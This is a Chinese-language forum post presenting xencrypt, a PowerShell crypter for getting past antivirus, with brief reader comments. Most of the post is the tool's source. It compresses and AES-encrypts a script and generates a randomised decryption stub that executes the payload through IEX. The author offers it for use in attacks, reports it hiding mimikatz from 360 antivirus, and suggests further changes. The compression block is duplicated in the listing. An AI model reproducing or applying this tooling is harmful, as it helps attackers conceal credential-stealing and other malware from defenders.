xencrypt工具原理分析及使用
我们在攻击过程中,经常会遇到有杀软拦截的情况,对于绕过的方式也不尽相同:有基于黑白名单的,有基于shellloader的,也有基于加密与混淆的。今天介绍一款工具-xencrypt是基于powershell编写的,原理是基于加密与混淆的工具,大家知道现在加密和混淆被杀软检测的狠,其实生存空间越来越难,这个工具主要觉得原来就用过,觉得效果还行,同时工具整体不复杂,可以基于需求自己修改来用。
工具的整体流程为
源码也是简洁明了,算上注释才200行,不算注释在150行左右:
1.读取文件
# read
Write-Output "[*] Reading '$($infile)' ..."
$codebytes = [System.IO.File]::ReadAllBytes($infile)
for ($i = 1; $i -le $iterations; $i++) {
# Decide on encryption params ahead of time
Write-Output "[*] Starting code layer ..."
$paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
$paddingmode = $paddingmodes | Get-Random
$ciphermodes = 'ECB','CBC'
$ciphermode = $ciphermodes | Get-Random
$keysizes = 128,192,256
$keysize = $keysizes | Get-Random
$compressiontypes = 'Gzip','Deflate'
$compressiontype = $compressiontypes | Get-Random
# compress
Write-Output "[*] Compressing ..."
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
if ($compressiontype -eq "Gzip") {
$compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
} elseif ( $compressiontype -eq "Deflate") {
$compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
}
$compressionStream.Write( $codebytes, 0, $codebytes.Length )
$compressionStream.Close()
$output.Close()
$compressedBytes = $output.ToArray()
Write-Output "[*] Compressing ..."
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
if ($compressiontype -eq "Gzip") {
$compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
} elseif ( $compressiontype -eq "Deflate") {
$compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
}
$compressionStream.Write( $codebytes, 0, $codebytes.Length )
$compressionStream.Close()
$output.Close()
$compressedBytes = $output.ToArray()
# generate key
Write-Output "[*] Generating encryption key ..."
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
if ($ciphermode -eq 'CBC') {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
} elseif ($ciphermode -eq 'ECB') {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
}
if ($paddingmode -eq 'PKCS7') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
} elseif ($paddingmode -eq 'ISO10126') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
} elseif ($paddingmode -eq 'ANSIX923') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
} elseif ($paddingmode -eq 'Zeros') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
}
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.GenerateKey()
$b64key = [System.Convert]::ToBase64String($aesManaged.Key)
Write-Output "[*] Encrypting ..."
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$aesManaged.Dispose()
$b64encrypted = [System.Convert]::ToBase64String($fullData)
Write-Output "[*] Finalizing code layer ..."
# now, randomize the order of any statements that we can to further increase variation
$stub_template = ''
$code_alternatives = @()
$code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
$code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
$code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
$code_alternatives = @()
$code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
$code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
$code_alternatives += '${4}.BlockSize = 128' + "`r`n"
$code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
$code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
$code_alternatives = @()
$code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
$code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
if ($compressiontype -eq "Gzip") {
$stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
} elseif ( $compressiontype -eq "Deflate") {
$stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
}
$stub_template += '${5}.CopyTo(${7})' + "`r`n"
$code_alternatives = @()
$code_alternatives += '${5}.Close()' + "`r`n"
$code_alternatives += '${4}.Dispose()' + "`r`n"
$code_alternatives += '${6}.Close()' + "`r`n"
$code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
$stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"
# it's ugly, but it beats concatenating each value manually.
$code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
$codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
}
Write-Output "[*] Writing '$($outfile)' ..."
[System.IO.File]::WriteAllText($outfile,$code)
Write-Output "[+] Done!"
使用minikataz测试一下效果,未经工具处理的检测结果
使用默认参数的效果
经过5次工具处理的结果
觉得效果还可以,毕竟国内常用的360这些还是过了的。项目地址:https://github.com/the-xentropy/xencrypt 有更高需要的,可以自己再改改源码
自评TCV=1
评论6次
搞powershell应该先搞amsi吧
powershell确实挺困难的
意义不大,defender都过不了。另外有amsi的存在,混淆powershell也没啥用
@895515845 确实是 感谢 他是加密上升级成了AES和XOR 和我评论里说的那样,如果自己想升级,可以升级一下key生成和加密这部分
BetterXencrypt是这个的升级版
自己修改的话,key生成和加密这个地方可以改一下